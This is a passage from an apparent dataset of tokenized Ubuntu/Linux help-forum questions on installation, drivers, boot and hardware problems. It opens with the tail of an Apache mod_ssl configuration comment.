exportation for cgi and ssi requests only . # o strictrequire : # this denies access when `` sslrequiressl '' or `` sslrequire '' applied even # under a `` satisfy any '' situation , i.e . when it applies access is denied # and no other module can change it . # o optrenegotiate : # this enables optimized ssl connection renegotiation handling when ssl # directives are used in per-directory context . # ssloptions +fakebasicauth +exportcertdata +strictrequire < filesmatch `` \ . ( cgi|shtml|phtml|php ) $ '' > ssloptions +stdenvvars < /filesmatch > < directory /usr/lib/cgi-bin > ssloptions +stdenvvars < /directory > # ssl protocol adjustments : # the safe and default but still ssl/tls standard compliant shutdown # approach is that mod_ssl sends the close notify alert but does n't wait for # the close notify alert from client . when you need a different shutdown # approach you can use one of the following variables : # o ssl-unclean-shutdown : # this forces an unclean shutdown when the connection is closed , i.e . no # ssl close notify alert is send or allowed to received . this violates # the ssl/tls standard but is needed for some brain-dead browsers . use # this when you receive i/o errors because of the standard approach where # mod_ssl sends the close notify alert . # o ssl-accurate-shutdown : # this forces an accurate shutdown when the connection is closed , i.e . a # ssl close notify alert is send and mod_ssl waits for the close notify # alert of the client . this is 100 % ssl/tls standard compliant , but in # practice often causes hanging connections with brain-dead browsers . use # this only for browsers where you know that their ssl implementation # works correctly . # notice : most problems of broken clients are also related to the http # keep-alive facility , so you usually additionally want to disable # keep-alive for those clients , too . use variable `` nokeepalive '' for this . # similarly , one has to force some clients to use http/1.0 to workaround # their broken http/1.1 implementation . use variables `` downgrade-1.0 '' and # `` force-response-1.0 '' for this . browsermatch `` msie [ 2-6 ] '' \ nokeepalive ssl-unclean-shutdown \ downgrade-1.0 force-response-1.0 # msie 7 and newer should be able to use keepalive browsermatch `` msie [ 17-9 ] '' ssl-unclean-shutdown
418749	how to install ubuntu on osx mavericks ?	i burned a dvd with ubuntu 13.04 64-bit a few months ago and i dont know how to install it . i have followed the instructions given here : http : //www.ubuntu.com/download/desktop/install-desktop-latest but when i restart my computer ( imac early 2009 ) with the dvd inserted the computer ejects the disc automatically when it starts up . if i insert the disc when the computer is on i get a message saying that the disc is not readable . and if i press the letter c on my keyboard when my computer starts up ( with the dvd inside ) i get a black screen . any help is greatly appreciated .
418753	latex package ctable and saucy salamander	i have a number of latex documents that use the package ctable in the header . upon updating ubuntu to saucy salamander , these documents have refused to compile , texmaker returning the error : '' ! no room for a new \dimen '' . upon commenting out the call to use this package , the document compiles fine ( albeit , more slowly than before the update ) . note that the particular document i have tested does not use any commands ( that i am aware of ) which rely on ctable . now this page says something about saucy salamander and this package , indicating the updater might have changed some settings or something . do i need to install/re-install/overwrite anything in order to ensure that my latex functions properly in saucy salamander ?
418755	apache module compilation failure	i was following some tutorial in web about the apache module compilation . i have already installed apache2-threaded-dev . when i try to compile the example_code from apache website i get : /usr/share/apr-1.0/build/libtool -- silent -- mode=compile -- tag=disable-static x86_64-linux-gnu-gcc -prefer-pic -dlinux=2 -d_fortify_source=2 -d_gnu_source -d_reentrant -i/usr /include/apr-1.0 -i/usr/include/openssl -i/usr/include/xmltok -pthread -i/usr/include/apache2 -i/usr/include/apr-1.0 -i/usr/include/apr-1.0 -c -o mod_example.lo mod_example.c & & touch mod_example.slo mod_example.c:13:1 : error : unknown type name 'module' mod_example.c:15:5 : error : 'standard20_module_stuff ' undeclared here ( not in a function ) apxs : error : command failed with rc=65536 it seems like i lack the header file .
418757	can i discover the format of archive ?	not long i have decided to make a compress of my archives .deb / tar.gz , on only one archive . no problem i compress , and i used split command to break that archive in many parts to ( upload - backup ) and works fine , but the problem is , i forgot what the format of the compress that i used . and now , i do n't know how to join the parts . i can anything to do ?
418758	fsck.ext4 does not fix a few corrupt files ?	i ran this fsck.ext4 -vf /dev/sdb2 , and the files were still corrupt ( garbage data ) ; /dev/sdb2 is on a ssd ; i had to use -f because /dev/sdb2 was clean ! my only hope is a backup ? or is there another command that could restore the files in some way ? or may be some configuration that makes the writes more sure/safe , even if the filesystem gets slower ? may be something that could be enabled on the fly without re-mounting ? ps . : i just had written the files and the blackout happened ; not all files got corrupt , just a few ; this question http : //unix.stackexchange.com/questions/87555/are-short-lived-files-flushed-to-disk , has some info on how data is written/flushed to the disk , but is not quite what i am looking for i guess..
418762	video editor with recording options	i 'm searching for a video editor which would also allow recording from microphone . it must run in lubuntu and include 3 features which would work simultaneously : seeing the video ( a moving picture , of course ) seeing and hearing the original audio track seeing and editing the audio track ( s ) which i record myself from my microphone i 've already installed many video editors , but not any of them allows me to record my own voice , neither from a built-in microphone , nor from a plug-in one . i 'm not very familiar with all the complicated linux stuff , so if you do answer , please do n't make it too complicated .
418764	microsoft headset randomly stops working	i have a microsoft lx 3000 headset that normally works fine . but today it has started randomly failing , what i mean is it works for a few minutes on a fresh boot and then stops ( and it disappears from pavucontrol ) unplugging and re-plugging sometimes makes it work again for a minute or less , sometimes it doesnât help at all running ubuntu 12.04 64bit with kde 4.12 and i did a software upgrade earlier today , before the problems started ( it was probably before they started ) any ideas please ? ksystemlog showed this one time : 09/02/2014 23:13:59 ajna-desktop kernel [ 385.923192 ] ohci_hcd 0000:00:04.0 : ohci unrecoverable error , disabled 09/02/2014 23:13:59 ajna-desktop kernel [ 385.923197 ] ohci_hcd 0000:00:04.0 : hc died ; cleaning up 09/02/2014 23:13:59 ajna-desktop kernel [ 385.923230 ] usb 4-2 : usb disconnect , device number 2 09/02/2014 23:13:59 ajna-desktop kernel [ 385.963790 ] ohci_hcd 0000:00:04.0 : leak ed ffff88003640a0f0 ( # 01 ) state 0 ( has tds ) 09/02/2014 23:13:59 ajna-desktop kernel [ 385.963795 ] ohci_hcd 0000:00:04.0 : leak ed ffff88003640a0a0 ( # 82 ) state 0 ( has tds ) 09/02/2014 23:13:59 ajna-desktop kernel [ 385.963798 ] ohci_hcd 0000:00:04.0 : leak ed ffff88003640a050 ( # 87 ) state 0 ( has tds ) 09/02/2014 23:13:59 ajna-desktop kernel [ 386.259382 ] irq 21 : nobody cared ( try booting with the `` irqpoll '' option ) 09/02/2014 23:13:59 ajna-desktop kernel [ 386.259389 ] pid : 2778 , comm : pulseaudio tainted : p o 3.2.0-58-generic # 88-ubuntu 09/02/2014 23:13:59 ajna-desktop kernel [ 386.259391 ] call trace : 09/02/2014 23:13:59 ajna-desktop kernel [ 386.259393 ] < irq > [ < ffffffff810dc7fd > ] __report_bad_irq+0x3d/0xe0 09/02/2014 23:13:59 ajna-desktop kernel [ 386.259406 ] [ < ffffffff810dcc35 > ] note_interrupt+0x135/0x190 09/02/2014 23:13:59 ajna-desktop kernel [ 386.259409 ] [ < ffffffff810da45a > ] handle_irq_event_percpu+0xaa/0x210 09/02/2014 23:13:59 ajna-desktop kernel [ 386.259412 ] [ < ffffffff81051605 > ] ? check_preempt_curr+0x75/0xa0 09/02/2014 23:13:59 ajna-desktop kernel [ 386.259415 ] [ < ffffffff810da611 > ] handle_irq_event+0x51/0x80 09/02/2014 23:13:59 ajna-desktop kernel [ 386.259417 ] [ < ffffffff810dd68a > ] handle_fasteoi_irq+0x6a/0x110 09/02/2014 23:13:59 ajna-desktop kernel [ 386.259421 ] [ < ffffffff81016272 > ] handle_irq+0x22/0x40 09/02/2014 23:13:59 ajna-desktop kernel [ 386.259424 ] [ < ffffffff8166ceea > ] do_irq+0x5a/0xe0 09/02/2014 23:13:59 ajna-desktop kernel [ 386.259427 ] [ < ffffffff8166222e > ] common_interrupt+0x6e/0x6e 09/02/2014 23:13:59 ajna-desktop kernel [ 386.259429 ] < eoi > [ < ffffffff8108c0cd > ] ? add_wait_queue+0x4d/0x60 09/02/2014 23:13:59 ajna-desktop kernel [ 386.259435 ] [ < ffffffff8152e690 > ] ? sock_tx_timestamp+0x40/0x40 09/02/2014 23:13:59 ajna-desktop kernel [ 386.259438 ] [ < ffffffff8152e691 > ] ? sock_poll+0x1/0x20 09/02/2014 23:13:59 ajna-desktop kernel [ 386.259440 ] [ < ffffffff8152e6aa > ] ? sock_poll+0x1a/0x20 09/02/2014 23:13:59 ajna-desktop kernel [ 386.259444 ] [ < ffffffff8118d7b2 > ] ? do_poll.isra.4+0x102/0x290 09/02/2014 23:13:59 ajna-desktop kernel [ 386.259446 ] [ < ffffffff8118e849 > ] do_sys_poll+0x1d9/0x260 09/02/2014 23:13:59 ajna-desktop kernel [ 386.259449 ] [ < ffffffff8118d430 > ] ? poll_freewait+0xe0/0xe0 09/02/2014 23:13:59 ajna-desktop kernel [ 386.259451 ] [ < ffffffff8118d520 > ] ? __pollwait+0xf0/0xf0 09/02/2014 23:13:59 ajna-desktop kernel [ 386.259453 ] [ < ffffffff8118d520 > ] ? __pollwait+0xf0/0xf0 09/02/2014 23:13:59 ajna-desktop kernel [ 386.259458 ] [ < ffffffff815d8013 > ] ? unix_stream_sendmsg+0x403/0x460 09/02/2014 23:13:59 ajna-desktop kernel [ 386.259461 ] [ < ffffffff8152f36e > ] ? sock_sendmsg+0x10e/0x130 09/02/2014 23:13:59 ajna-desktop kernel [ 386.259464 ] [ < ffffffff8118d9c5 > ] ? poll_select_set_timeout+0x85/0xa0 09/02/2014 23:13:59 ajna-desktop kernel [ 386.259466 ] [ < ffffffff8118eb34 > ] sys_ppoll+0xe4/0x180 09/02/2014 23:13:59 ajna-desktop kernel [ 386.259469 ] [ < ffffffff8166a3c2 > ] system_call_fastpath+0x16/0x1b 09/02/2014 23:13:59 ajna-desktop kernel [ 386.259471 ] handlers : 09/02/2014 23:13:59 ajna-desktop kernel [ 386.259474 ] [ < ffffffff81496960 > ] usb_hcd_irq 09/02/2014 23:13:59 ajna-desktop kernel [ 386.259482 ] [ < ffffffffa01511e0 > ] azx_interrupt 09/02/2014 23:13:59 ajna-desktop kernel [ 386.259484 ] disabling irq # 21 09/02/2014 23:13:59 ajna-desktop pulseaudio [ 2778 ] [ alsa-sink ] alsa-util.c : could not recover from pollerr|pollnval|pollhup with snd_pcm_prepare ( ) : no such device 09/02/2014 23:13:59 ajna-desktop pulseaudio [ 2778 ] [ alsa-sink ] alsa-util.c : got pollnval from alsa 09/02/2014 23:13:59 ajna-desktop pulseaudio [ 2778 ] [ alsa-source ] alsa-util.c : could not recover from pollerr|pollnval|pollhup and xrun : no such device 09/02/2014 23:09:35 ajna-desktop pulseaudio [ 2778 ] [ pulseaudio ] module-gconf.c : pa_module_load ( ) failed 09/02/2014 23:09:35 ajna-desktop pulseaudio [ 2778 ] [ pulseaudio ] module.c : failed to open module `` module-esound-protocol-tcp '' : file not found 09/02/2014 23:09:41 ajna-desktop pulseaudio [ 2819 ] [ pulseaudio ] pid.c : daemon already running . and this another time it cut out : 09/02/2014 23:13:59 ajna-desktop kernel [ 385.923192 ] ohci_hcd 0000:00:04.0 : ohci unrecoverable error , disabled 09/02/2014 23:13:59 ajna-desktop kernel [ 385.923197 ] ohci_hcd 0000:00:04.0 : hc died ; cleaning up 09/02/2014 23:13:59 ajna-desktop kernel [ 385.923230 ] usb 4-2 : usb disconnect , device number 2 09/02/2014 23:13:59 ajna-desktop kernel [ 385.963790 ] ohci_hcd 0000:00:04.0 : leak ed ffff88003640a0f0 ( # 01 ) state 0 ( has tds ) 09/02/2014 23:13:59 ajna-desktop kernel [ 385.963795 ] ohci_hcd 0000:00:04.0 : leak ed ffff88003640a0a0 ( # 82 ) state 0 ( has tds ) 09/02/2014 23:13:59 ajna-desktop kernel [ 385.963798 ] ohci_hcd 0000:00:04.0 : leak ed ffff88003640a050 ( # 87 ) state 0 ( has tds ) 09/02/2014 23:13:59 ajna-desktop kernel [ 386.259382 ] irq 21 : nobody cared ( try booting with the `` irqpoll '' option ) 09/02/2014 23:13:59 ajna-desktop kernel [ 386.259389 ] pid : 2778 , comm : pulseaudio tainted : p o 3.2.0-58-generic # 88-ubuntu 09/02/2014 23:13:59 ajna-desktop kernel [ 386.259391 ] call trace : 09/02/2014 23:13:59 ajna-desktop kernel [ 386.259393 ] < irq > [ < ffffffff810dc7fd > ] __report_bad_irq+0x3d/0xe0 09/02/2014 23:13:59 ajna-desktop kernel [ 386.259406 ] [ < ffffffff810dcc35 > ] note_interrupt+0x135/0x190 09/02/2014 23:13:59 ajna-desktop kernel [ 386.259409 ] [ < ffffffff810da45a > ] handle_irq_event_percpu+0xaa/0x210 09/02/2014 23:13:59 ajna-desktop kernel [ 386.259412 ] [ < ffffffff81051605 > ] ? check_preempt_curr+0x75/0xa0 09/02/2014 23:13:59 ajna-desktop kernel [ 386.259415 ] [ < ffffffff810da611 > ] handle_irq_event+0x51/0x80 09/02/2014 23:13:59 ajna-desktop kernel [ 386.259417 ] [ < ffffffff810dd68a > ] handle_fasteoi_irq+0x6a/0x110 09/02/2014 23:13:59 ajna-desktop kernel [ 386.259421 ] [ < ffffffff81016272 > ] handle_irq+0x22/0x40 09/02/2014 23:13:59 ajna-desktop kernel [ 386.259424 ] [ < ffffffff8166ceea > ] do_irq+0x5a/0xe0 09/02/2014 23:13:59 ajna-desktop kernel [ 386.259427 ] [ < ffffffff8166222e > ] common_interrupt+0x6e/0x6e 09/02/2014 23:13:59 ajna-desktop kernel [ 386.259429 ] < eoi > [ < ffffffff8108c0cd > ] ? add_wait_queue+0x4d/0x60 09/02/2014 23:13:59 ajna-desktop kernel [ 386.259435 ] [ < ffffffff8152e690 > ] ? sock_tx_timestamp+0x40/0x40 09/02/2014 23:13:59 ajna-desktop kernel [ 386.259438 ] [ < ffffffff8152e691 > ] ? sock_poll+0x1/0x20 09/02/2014 23:13:59 ajna-desktop kernel [ 386.259440 ] [ < ffffffff8152e6aa > ] ? sock_poll+0x1a/0x20 09/02/2014 23:13:59 ajna-desktop kernel [ 386.259444 ] [ < ffffffff8118d7b2 > ] ? do_poll.isra.4+0x102/0x290 09/02/2014 23:13:59 ajna-desktop kernel [ 386.259446 ] [ < ffffffff8118e849 > ] do_sys_poll+0x1d9/0x260 09/02/2014 23:13:59 ajna-desktop kernel [ 386.259449 ] [ < ffffffff8118d430 > ] ? poll_freewait+0xe0/0xe0 09/02/2014 23:13:59 ajna-desktop kernel [ 386.259451 ] [ < ffffffff8118d520 > ] ? __pollwait+0xf0/0xf0 09/02/2014 23:13:59 ajna-desktop kernel [ 386.259453 ] [ < ffffffff8118d520 > ] ? __pollwait+0xf0/0xf0 09/02/2014 23:13:59 ajna-desktop kernel [ 386.259458 ] [ < ffffffff815d8013 > ] ? unix_stream_sendmsg+0x403/0x460 09/02/2014 23:13:59 ajna-desktop kernel [ 386.259461 ] [ < ffffffff8152f36e > ] ? sock_sendmsg+0x10e/0x130 09/02/2014 23:13:59 ajna-desktop kernel [ 386.259464 ] [ < ffffffff8118d9c5 > ] ? poll_select_set_timeout+0x85/0xa0 09/02/2014 23:13:59 ajna-desktop kernel [ 386.259466 ] [ < ffffffff8118eb34 > ] sys_ppoll+0xe4/0x180 09/02/2014 23:13:59 ajna-desktop kernel [ 386.259469 ] [ < ffffffff8166a3c2 > ] system_call_fastpath+0x16/0x1b 09/02/2014 23:13:59 ajna-desktop kernel [ 386.259471 ] handlers : 09/02/2014 23:13:59 ajna-desktop kernel [ 386.259474 ] [ < ffffffff81496960 > ] usb_hcd_irq 09/02/2014 23:13:59 ajna-desktop kernel [ 386.259482 ] [ < ffffffffa01511e0 > ] azx_interrupt 09/02/2014 23:13:59 ajna-desktop kernel [ 386.259484 ] disabling irq # 21 09/02/2014 23:13:59 ajna-desktop pulseaudio [ 2778 ] [ alsa-sink ] alsa-util.c : could not recover from pollerr|pollnval|pollhup with snd_pcm_prepare ( ) : no such device 09/02/2014 23:13:59 ajna-desktop pulseaudio [ 2778 ] [ alsa-sink ] alsa-util.c : got pollnval from alsa 09/02/2014 23:13:59 ajna-desktop pulseaudio [ 2778 ] [ alsa-source ] alsa-util.c : could not recover from pollerr|pollnval|pollhup and xrun : no such device 09/02/2014 23:09:35 ajna-desktop pulseaudio [ 2778 ] [ pulseaudio ] module-gconf.c : pa_module_load ( ) failed 09/02/2014 23:09:35 ajna-desktop pulseaudio [ 2778 ] [ pulseaudio ] module.c : failed to open module `` module-esound-protocol-tcp '' : file not found 09/02/2014 23:09:41 ajna-desktop pulseaudio [ 2819 ] [ pulseaudio ] pid.c : daemon already running .
418765	tumblr , dragging images	when i try and drag images from tumblr to the desktop , ( which i can easily do with windows ) i get mixed results , one is it sends the link to the desktop , and the other it actually works . i am using the ctrl key also , any thoughts ?
418767	boot from usb drive on windows 7	i have a usb drive that i downloaded linux onto but when i try to boot it onto my windows 7 computer it does n't show up in the boot menu . i have used linuxlive usb creator to configure the flash drive , but it still does not show up
418768	laptop drivers installation problem with ubuntu	i am using ubuntu for the first time on an asus laptop , with a dvd containing the windows 7 64bit drivers for the laptop . how can i install these drivers on my laptop with the ubuntu ?
418769	dualbooting windows 8.1 pro and ubuntu 13.10	i am trying to install ubuntu 13.10 alongside windows 8.1 pro ( i know it 's depressing i 'm using windows oses still ) and when i try to shrink the volume i am allowed only 2796 mb even though i have over 800gb available on the hdd . how i can get around this and shrink the volume to 25600 mb or more ? ran disk cleanup and disk defrag with no further help either . any suggestions or advice would be very , very much appreciated . thanks in advance for the help . i had just disabled fast startup as well . would this make any difference .
418770	touchpad-indicator not working	i installed touchpad-indicator for my hp pavilion laptop , and now i 'm having problems with hit working . i 've searched but have not found answers for this specific problem . i really need to be able to toggle the touchpad on and off when using libreoffice writer . the default shortcut [ ctr+alt+c ] activates a note-taking feature in writer and does not disable the touchpad . after changing the shortcut from 'c ' to other characters , the touchpad will disable but will not enable when i need it . i 've had to manually reboot every time i 've toyed around with it . please help .
418771	uncompress and pipe the output to script	i have a script that takes an input with a -i flag . the input file i have is compressed ( .gz ) . what i want to do ( not sure it 's possible ) , because the file is huge , do some thing like this : gunzip -c myfile.gz | myscript.pl -i stdin -o myoutfile.txt so pipe the output of the decompression to my scripts input flag .
418775	dualboot ubuntu on macbook pro	hi i 've been using ubuntu for years now on windows , but recently i 've gotten a macbook so i could use xcode and i would like to know if their is a way to dual boot osx and ubuntu without any extra software just like on windows ? could i possibly use bootcamp instead of the extra add-ons like refit ? ďťż
418778	teamviewer installation not working	trying to install teamviewer 9 on raring ringtail . i am running the 64 bit deb file from http : //download.teamviewer.com/download/teamviewer_linux_x64.deb when i run it for the first time from the ubuntu software centre , the installation finished nearly to the end and then the software centre faced some error and shut down . when i run it again , i get a dependency error . see this i have used the same installer for quantal and mint petra and in both cases it worked just fine . please help .
418781	software that will use keyword to voice activate an app	i am looking for a lite software or script that will activate an application when a keyword is triggered . i want to use it with google2ubuntu , for example i would set a keyword ( ubuntu ) and it would activate google2ubuntu and the rest is history . can anyone help me with this ?
418788	how do i configure noatime upon installation ?	i need to disable it as i will install linux on a usb stick , or something like that . thank you .
418790	lubuntu bootloader does not work properly	i am trying to install lubuntu on my older laptop . i have created a bootable cd and the install seems to go fine , but after i am prompted to remove the boot disk and restart , the computer boots straight to windows . i have tried boot-repair to no avail . the url boot-repair puts out is : http : //paste.ubuntu.com/6906712/ . inside the bootable cd , i have checked the partitions through the terminal . it seems as though there are no linux partitions . i am not sure if there is supposed to be one after a linux install ( again newer linux user ) . i am not sure whether my problem is with the install itself or simply with grub . how can i fix or debug this ?
418791	ubuntu wo n't connect to my bell router !	i am new to ubuntu and i ca n't seem to figure out how to connect to the wireless through my bell router . i am using ubuntu 12.04 in virtualbox on a macbook pro retina , and do not have the adapter to connect over ethernet . thanks .
418794	ubuntu wo n't shutdown ever by any means , just restarts	so , as the title says , my computer wo n't shutdown , it just restarts . here 's a list of the things that i 've tried : use 2nd bios boot from ubuntu usb . shutdown from windows 7 . sleep in windows 7 . ( wakes immediately ) unplug all peripherals . reinstall grub2 what is wrong ?
418799	my laptop wo n't stay asleep !	i 'm using 12.04.3 on a toshiba satellite c55d-a and it has 4 gb ram and a 500 gb hard disk . it seems like it wants to go to sleep when you click suspend but it has a habit of waking up after 10 secs on suspend . is it because i have too new of a laptop model or what ? i did go to power settings and changed it like i was supposed to , but its still doing the same thing it was before i did change the power settings its not working .
418805	i want to purchase the toshiba satellite c55-a5281 laptop but need to make sure ubuntu will work	i have had really good luck installing ubuntu on many different random desktops and laptops , and i have never had a problem . but this would be the first windows 8 machine that i have purchased , and i have heard that windows 8 makes it harder to install ubuntu next to it , it does n't want to play nice or something . i also need to make sure that the machine can boot from a usb stick so i can even install ubuntu . has anyone had any experiance with this particular laptop ? or other windows 8 things to look out for ? i think this is an ok link to check it out.. http : //www.toshiba.com/us/computers/laptops/satellite/c50/c55-a5281 basically i am hoping someone who knows a bit more about it than i , can verify that i will be able to install ubuntu on it ... i can not abide windows . lol .
418809	chrome menu options not revealed through ubuntu unity hud	i am running chrome version 33.0.1750.70 beta and i ca n't get any menu commands to appear in the unity hud . is there any way to force this or is it up to google developers to add this into chrome source ?
418813	xubuntu indicator sound service using high cpu	the process /usr/lib/x86_64-linux-gnu/indicator-sound-service is frequently using up to 20 % of my cpu which seems a bit excessive . at the same time that this started occurring , my function keys to control the volume have stopped working . i am running xubuntu 13.10 and also have the problem of the sound indicator on the panel showing incorrect information although i am unsure if this is related . thanks heaps . by the way i am a real beginner with linux : )
418814	how to make a live usb for mac ( using ubuntu )	i want to make a live usb of ubuntu 13.10 for an intel mac . i am using my ubuntu pc to do this , i think there has to be a certain filesystem to use for the flash drive . i have looked online , but i got how to do this from a mac . the mac is not mine , but i am allowed to use bootable flash drives on it . i hate how slow osx is and i need something more reliable like ubuntu , so if anyone knows how to make a live usb for an intel mac please post below . thaks
418815	when will firefox have pixel-perfect scrolling in ubuntu ?	last i rebooted into win8 i saw firefox had pixel-perfect scrolling - like ubuntu has with nautilus , gedit and some other apps . when will firefox for ubuntu have scrolling that does n't act like mouse wheel clicks ?
418816	not showing any bootable options on grub	i 'm using ubuntu 13.10 and trying to install windows 7 instead , but when i hold shift on start-up to open the grub menu , there 's no other bootable options . i 'm trying to boot from a cd but it does n't give me the option to install windows . i 'm very new to linux and ubuntu , i would really appreciate some help
418819	login error on 12.10	i recently updated my laptop form ubuntu 12.04 lts to 12.10 and when trying to login , it presents me with a black login screen immediately and asks for the login for the laptop . whenever i try and give it the right login and password it says login failed and tells me to login again . i have looked into solutions but they all seem to require being able to login from the screen that i get .
418824	all videos speeding up	anything i watch , whether it 's a youtube video , a torrented movie , or a streaming video , gets sped up and unbearable to watch . how can i make my computer go back to playing videos at a normal speed ?
418827	thunderbird indicator ubuntu 13.10	i just upgraded to 13.10 and noticed that when i get a new email via thunderbird , the little indicator lights up blue as usual , but there are n't any bubble notifications that pop up . they are really helpful to me so i 'm disappointed to see that they are n't working at the moment . i do n't have any add ons installed and am running thunderbird 24.2.0 any suggestions to get the bubble notifications back ?
418829	how to create a two node cluster for ubuntu 12.04 ?	i have 2 pcs running ubuntu 12.04 desktop version connected via 1 gigabit ethernet switch . i would like to create a 2 node cluster and configure torque to submit and schedule jobs on the two nodes . please note that i am not interested in running mpi type jobs across the nodes . my calculations would be run on one node at at time , but rather than wait and manually submit a new job when a job is finished , i would like to submit multiple jobs using qsub and have them queued until a node is freed up . i guess my question could be divided into two parts a ) what is the best cluster setup for the system i have described in the above ? b ) how do i setup torque after setting up the cluster . please note that i have already installed torque on each machine . thanks in advance
418832	how to restrict two users of ubuntu to see other 's data	i have installed ubuntu with two folders i.e . / and /home with swap area . i have made two users in /home . but user1 can check the data of user2 and hence vice-versa . i wish to restrict one user to see other 's data . please suggest me how to do so . thanks in advance .
418836	accidentally uninstalled network manager	before my network was n't working , and i was told to uninstall the network manager , but now , i do n't know how to get it back ... does anyone have the steps to not only fix my network manager , but also fix my network through terminal commands ? thank you !
418843	how can i connect to the internet in ubuntu server ?	i just installed ubuntu server , but i ca n't figure out how to connect to the internet , can any one help me ? doing it through ethernet or wifi are both available options and please keep in mind i am new to the terminal . thanks !
418844	how to install the iball 3.5gh-75 modem in ubuntu 13.10 ?	how should i can install my iball3.5gh-72 modem in ubuntu 13.10
418849	how to install tar.gz file	trying to install catlateral damage using the usual extracting and installing commands on the terminal , but it keeps tossing me annoying errors . probably missing something obvious . both the archive and the file are on my desktop . note : the file created by extracting the archive starts out named the same , but then switches to `` linux '' . i tried renaming it catlateraldamage too . rachael @ rachael-desktop : ~ $ cd /home/rachael/desktop/catlateraldamage bash : cd : /home/rachael/desktop/catlateraldamage : no such file or directory rachael @ rachael-desktop : ~ $ cd /home/rachael/desktop/catlateral damage bash : cd : /home/rachael/desktop/catlateral : no such file or directory rachael @ rachael-desktop : ~ $ cd /home/rachael/desktop/catlateraldamage bash : cd : /home/rachael/desktop/catlateraldamage : no such file or directory rachael @ rachael-desktop : ~ $ cd /home/rachael/desktop/catlateraldamage_v4.1a_linux.tar.gz bash : cd : /home/rachael/desktop/catlateraldamage_v4.1a_linux.tar.gz : no such file or directory rachael @ rachael-desktop : ~ $ tar -xzf catlateraldamage_v4.1a_linux.tar.gz tar ( child ) : catlateraldamage_v4.1a_linux.tar.gz : can not open : no such file or directory tar ( child ) : error is not recoverable : exiting now tar : child returned status 2 tar : error is not recoverable : exiting now rachael @ rachael-desktop : ~ $ sudo apt-get install catlateraldamage [ sudo ] password for rachael : reading package lists ... done building dependency tree reading state information ... done e : unable to locate package catlateraldamage rachael @ rachael-desktop : ~ $ cd /home/rachael/desktop/linux bash : cd : /home/rachael/desktop/linux : no such file or directory rachael @ rachael-desktop : ~ $ tar -zxvf catlateraldamage_v4.1a_linux.tar.gz tar ( child ) : catlateraldamage_v4.1a_linux.tar.gz : can not open : no such file or directory tar ( child ) : error is not recoverable : exiting now tar : child returned status 2 tar : error is not recoverable : exiting now rachael @ rachael-desktop : ~ $
418851	ldap setup : unmet dependencies	i have use the ubuntu 12.04 , when i try to setup ldap in my system at that time getting dependencies error given below we have use the command in terminal sudo apt-get install slapd ldap-utils some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : ldap-utils : depends : libldap-2.4-2 ( = 2.4.28-1.1ubuntu4 ) but 2.4.28-1.1ubuntu4.4 is to be installed slapd : depends : libldap-2.4-2 ( = 2.4.28-1.1ubuntu4 ) but 2.4.28-1.1ubuntu4.4 is to be installed e : unable to correct problems , you have held broken packages .
418856	why does ubuntu 12.04 logout as soon as i login ?	so i was working on ubuntu and i had to go away for about 5 mins and closed my chromebook 's screen , when i came back and opened the screen i found out it shut down by itself . so turned it back on and tried to login into ubuntu and the screen went black which means i 'm logging in but it comes back to the screen of logging out
418861	my external hard drive was not properly removed and now will not mount	i recently bought a computer for my wife , windows ( her choice not mine ) . before we paid , i asked the salesman to check whether my hard drive would work with windows 7 ( as sometimes windows can be iffy ) . it worked fine , however , the salesman yanked my hard drive out without removing it safely . now it wont mount , in my ubuntu computer or her new windows . i 've tried a lot of instructions but none work . this is what i 'm up against : sammy @ fart : ~ $ sudo fdisk -l disk /dev/sda : 500.1 gb , 500107862016 bytes 255 heads , 63 sectors/track , 60801 cylinders , total 976773168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00077cf7 device boot start end blocks id system /dev/sda1 * 2048 206847 102400 7 hpfs/ntfs/exfat /dev/sda2 206848 20482047 10137600 7 hpfs/ntfs/exfat /dev/sda3 20482048 177605687 78561820 7 hpfs/ntfs/exfat /dev/sda4 177606654 976771071 399582209 5 extended /dev/sda5 177606656 971016191 396704768 83 linux /dev/sda6 971018240 976771071 2876416 82 linux swap / solaris disk /dev/sdb : 500.1 gb , 500107861504 bytes 255 heads , 63 sectors/track , 60801 cylinders , total 976773167 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0xe640222c device boot start end blocks id system /dev/sdb1 63 976768064 488384001 7 hpfs/ntfs/exfat so , would i be right in presuming that my hard drive is /dev/sdb1 ? i tried to mount it manually and got this error message : sammy @ fart : ~ $ sudo mount -t ntfs /dev/sdb1 /media error reading bootsector : input/output error failed to mount '/dev/sdb1 ' : input/output error ntfs is either inconsistent , or there is a hardware fault , or it 's a softraid/fakeraid hardware . in the first case run chkdsk /f on windows then reboot into windows twice . the usage of the /f parameter is very important ! if the device is a softraid/fakeraid then first activate it and mount a different device under the /dev/mapper/ directory , ( e.g . /dev/mapper/nvidia_eahaabcc1 ) . please see the 'dmraid ' documentation for more details . i tried to run chkdsk /f on windows but it would not run due to my disk already being used by another process . now i 'm stuck . i 'm not new to ubuntu but i 'm not a computer whizz either . i do n't really know anything about softraid/fakeraid and have no idea what to do . any help would be very much appreciated . p.s . ( to answer the first question you may have on your mind , yes i regret calling my computer `` fart '' ) thanks alot , sammy update : i 've now successfully completed check disk and it has n't solved a thing . nothing suggested has worked and i 've run out of ideas .
418863	bluetooth drivers for toshiba 13.10	where can i download blue tooth driver for my toshiba s50 series laptop i tried installing from toshiba website using wine did not work out ! !
418865	why ai n't the speakers working after installing wifi module ?	my laptop speakers are not working in ubuntu 12.04 ( but headphones are working ) after installing wi-fi module . and it is showing an error `` muxinfo call failed '' before startup . i tried the answers of no sound by speaker in ubuntu 12.04 , only by headphones ( re installing , updating and in liveusb without sound ) but they did n't work . how can i get rid of this problem ?
418870	failed install ubuntu 12.04	i 'm trying to install ubuntu 12.04 in my laptop ( hp spectre 13 , which is already running windows 8.1 ) . i 'm using a usb flash drive ( ubuntu-12.04.3-desktop-amd64.iso ) . before installing it , i used the option `` try ubuntu before install '' but after a few seconds the screen goes black and nothing happens . any advice how to understand the problem and fix it ? thanks .
